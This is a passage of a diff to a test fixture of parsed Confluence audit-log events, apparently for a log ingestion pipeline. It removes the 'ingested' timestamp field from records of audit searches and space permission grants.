76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.149Z\"}]}", "type": "info", "kind": "event" @@ -235,7 +233,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837454941Z", "original": "{\"timestamp\":\"2021-11-23T00:41:45.280Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"77 - 176\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.155Z - 2021-11-23T00:41:17.165Z\"}]}", "type": "info", "kind": "event" @@ -318,7 +315,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837456233Z", "original": "{\"timestamp\":\"2021-11-23T00:41:17.165Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.137Z\"}]}", "type": "info", "kind": "event" @@ -401,7 +397,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837457213Z", "original": "{\"timestamp\":\"2021-11-23T00:41:16.741Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"75 - 174\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.143Z - 2021-11-23T00:41:07.156Z\"}]}", "type": "info", "kind": "event" @@ -484,7 +479,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837458194Z", "original": "{\"timestamp\":\"2021-11-23T00:41:07.156Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"72\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.128Z\"}]}", "type": "info", "kind": "event" @@ -567,7 +561,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837459111Z", "original": "{\"timestamp\":\"2021-11-23T00:41:06.871Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"73 - 172\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.132Z - 2021-11-23T00:40:32.595Z\"}]}", "type": "info", "kind": "event" @@ -650,7 +643,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837460033Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.595Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"70\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.115Z\"}]}", "type": "info", "kind": "event" @@ -733,7 +725,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837461002Z", "original": "{\"timestamp\":\"2021-11-23T00:40:32.138Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"71 - 170\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.122Z - 2021-11-23T00:39:37.908Z\"}]}", "type": "info", "kind": "event" @@ -826,7 +817,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837461983Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.908Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -926,7 +916,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837462988Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.904Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1026,7 +1015,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837464238Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.899Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1119,7 +1107,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837465215Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.895Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1219,7 +1206,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837466478Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.891Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1319,7 +1305,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837467455Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.887Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1419,7 +1404,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837468383Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.882Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1512,7 +1496,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837469542Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.877Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1612,7 +1595,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837470594Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.872Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1712,7 +1694,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837471911Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.868Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1812,7 +1793,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837473008Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.862Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1905,7 +1885,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837473958Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.858Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2005,7 +1984,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837474991Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.853Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2105,7 +2083,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837475910Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.848Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2205,7 +2182,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837476994Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.841Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2298,7 +2274,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837477906Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.832Z\",\"author\":{\"name\":\"test 